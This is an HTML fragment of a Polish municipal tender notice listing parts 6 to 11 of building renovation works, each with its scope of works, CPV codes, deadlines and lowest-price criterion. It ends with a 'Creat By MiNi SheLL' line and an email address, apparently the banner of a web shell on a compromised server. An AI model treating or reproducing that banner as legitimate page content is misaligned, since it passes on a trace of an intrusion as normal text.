<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Powiatowe Centrum Zarządzania Kryzysowego w dzielnicy Śródmieście; wymiana wykładziny podłogowej w pomieszczeniu socjalnym.
Zakres robót:
- zerwanie istniejącej wykładziny,
- uzupełnienie wylewki i tynków,
- wykonanie wylewki samopoziomującej,
- ułożenie nowej wykładziny rulonowej PVC wraz z montażem cokolików.

Szczegółowy zakres prac precyzują przedmiary robót, specyfikacje techniczne wykonania i odbioru robót. Załącznik do SIWZ stanowią rysunki poglądowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.43.00.00-0, 45.43.21.11-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Powiatowe Centrum Zarządzania Kryzysowego w dzielnicy Śródmieście; renowacja drewnianych stopni w klatce schodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Powiatowe Centrum Zarządzania Kryzysowego w dzielnicy Śródmieście; renowacja drewnianych stopni w klatce schodowej.
Zakres robót:
- demontaż stopni schodowych
-  cyklinowanie stopni i podestów,
- lakierowanie,
- ponowny montaż stopni.

Szczegółowy zakres prac precyzują przedmiary robót, specyfikacje techniczne wykonania i odbioru robót. Załącznik do SIWZ stanowią rysunki poglądowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kryta Pływalnia i hala sportowa MOSiR w dzielnicy Śródmieście; renowacja parkietu hali oraz przebudowa szatni w holu głównym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kryta Pływalnia i hala sportowa MOSiR w dzielnicy Śródmieście; renowacja parkietu hali oraz przebudowa szatni w holu głównym.
Zakres robót:
- inwentaryzacja linii pół gry,
- demontaż drabinek gimnastycznych, obudów grzejników, kratek wentylacyjnych w posadzce oraz cokolików,
- cyklinowanie i lakierowanie parkietu hali sportowej, 
- odtworzenie linii pól gry zgodnie z obecną, zinwentaryzowaną geometrią,
- roboty rozbiórkowe w szatni w holu głównym (blat podawczy, ścianka podblatowa, boazeria 
z paneli PVC, stalowa konstrukcja wieszaków, stolarka drzwiowa, wykładzina podłogowa, wylewka cementowa),
- zamurowanie otworu drzwiowego,
- uzupełnienie tynków,
- wykonanie nowej wylewki cementowej,
- wykonanie posadzki z płytek ceramicznych,
- roboty malarskie,
- dostawa i montaż szafek ubraniowych z laminatu HPL (wymiar pojedynczej szafki: szerokość 30 cm, głębokość 50 cm, wysokość 80 cm) zakres dostawy obejmuje 10 szafek pojedynczych i 20 szafek podwójnych (w układzie pionowym o wysokości 1,6 m); łącznie 50 boksów; zarówno szafki pojedyncze jak i podwójne na regulowanych stopkach; zamki z kluczykiem i mechanizmem wrzutowym na monetę o nominale 2 zł.

Szczegółowy zakres prac precyzują przedmiary robót, specyfikacje techniczne wykonania i odbioru robót. Załącznik do SIWZ stanowią rysunki poglądowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.43.00.00-0, 45.43.21.14-6, 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.02.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zespół Szkolno-Przedszkolny nr 8 (Przedszkole nr 19) w dzielnicy Boguszowice Osiedle; remont elementów małej architektury przy budynku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zespół Szkolno-Przedszkolny nr 8 (Przedszkole nr 19) w dzielnicy Boguszowice Osiedle; remont elementów małej architektury przy budynku.
Zakres robót:
- roboty demontażowe (demontaż balustrad, skucie schodów zewnętrznych, rozbiórka opasek,
demontaż krat studzienek doświetlających, rozbiórka koron betonowych studzienek doświetlających, rozbiórka bramy ogrodzeniowej, rozbiórka muru oporowego przy zejściu do kotłowni, częściowy demontaż nawierzchni z płyt drogowych),
- roboty ziemne związane z odtworzeniem muru oporowego przy zejściu do kotłowni oraz wykonaniem fundamentów pod murki przy wejściach,
- szalowanie, zbrojenie i betonowanie muru oporowego i murków przy wejściach (należy zastosować szalunki systemowe o jednorodnej fakturze w celu uzyskania powierzchni pozwalającej na wykończenie tylko w formie malowania),
- rozbiórka nawierzchni z płyt chodnikowych i korytowanie pod wykonanie nowej nawierzchni,
- założenie obrzeży betonowych,
- wykonanie opaski żwirowej wokół budynku,
- częściowa wymiana nawierzchni chodników (bruk betonowy gr. 6 cm) wraz z formowaniem stopni schodowych z krawężników betonowych,
- dostawa ziemi żyznej wraz z jej rozplantowaniem,
- założenie trawników siewem,
- uzupełnienie izolacji termicznej wraz z tynkiem,
- malowanie cokołu,
- inwentaryzacja geodezyjna powykonawcza.

Szczegółowy zakres prac precyzują przedmiary robót, specyfikacje techniczne wykonania i odbioru robót. Załącznik do SIWZ stanowią rysunki poglądowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.44.21.00-8, 45.11.13.00-1, 45.11.12.91-4, 45.26.23.10-7, 45.26.23.00-4, 45.23.32.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dom Kultury w dzielnicy Boguszowice Osiedle; remont pokrycia dachu nad widownią oraz izolacja przewodów wentylacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dom Kultury w dzielnicy Boguszowice Osiedle; remont pokrycia dachu nad widownią oraz izolacja przewodów wentylacyjnych.
Zakres robót:
- rozbiórka kominów wraz z zabetonowaniem w poziomie stropu nieczynnych kanałów,
- demontaż wpustów dachowych,
- przycięcie izolacji termicznej i wykonanie obróbki koryt zlewowych z blachy stalowej ocynkowanej,
- wykonanie wstępnego krycia koryt z papy termozgrzewalnej oraz założenie i uszczelnienie wpustów dachowych,
- założenie geowłókniny separującej warstwy pokrycia,
- montaż kominków wentylacyjnych pokrycia dachu,
- wykonanie pokrycia dachu i ścianek attykowych z membrany dachowej PVC,
- montaż listew dociskowych na ściankach attykowych,
- izolacja kanału wentylacyjnego płytami z hydrofobizowanej wełny mineralnej wraz z obudową z blachy stalowej ocynkowanej.

Szczegółowy zakres prac precyzują przedmiary robót, specyfikacje techniczne wykonania i odbioru robót. Załącznik do SIWZ stanowią rysunki poglądowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.26.19.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Ośrodek Interwencji Kryzysowej i Psychoterapii w dzielnicy Śródmieście; remont dachu (wymiana skorodowanych elementów konstrukcji więźby, wymiana pokrycia i obróbek blacharskich).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ośrodek Interwencji Kryzysowej i Psychoterapii w dzielnicy Śródmieście; remont dachu (wymiana skorodowanych elementów konstrukcji więźby, wymiana pokrycia i obróbek blacharskich).
Zakres robót:
- demontaż rynien i obróbek blacharskich,
- naprawa tynków kominów,
- wymiana skorodowanych biologicznie elementów konstrukcji więźby dachowej,
- montaż wyłazu dachowego,
- założenie nowych obróbek blacharskich i rynien,
- wykonanie pokrycia dachu z 2 warstw papy termozgrzewalnej,
- demontaż i ponowny montaż instalacji piorunochronnej.

Szczegółowy zakres prac precyzują przedmiary robót, specyfikacje techniczne wykonania i odbioru robót. Załącznik do SIWZ stanowią rysunki poglądowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.26.19.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Powiatowy Zespół ds. Orzekania o Niepełnosprawności w dzielnicy Śródmieście; remont podjazdu dla niepełnosprawnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Powiatowy Zespół ds. Orzekania o Niepełnosprawności w dzielnicy Śródmieście; remont podjazdu dla niepełnosprawnych.
Zakres robót:
- rozbiórka istniejącego podjazdu,
- wykonanie szalunków oraz zbrojenie i betonowanie nowych murków,
- formowanie podbudowy podjazdu,
- wykonanie nowej nawierzchni z bruku betonowego,
- montaż balustrad.

Szczegółowy zakres prac precyzują przedmiary robót, specyfikacje techniczne wykonania i odbioru robót. Załącznik do SIWZ stanowią rysunki poglądowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.11.13.00-1, 45.26.23.10-7, 45.26.23.00-4, 45.23.32.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com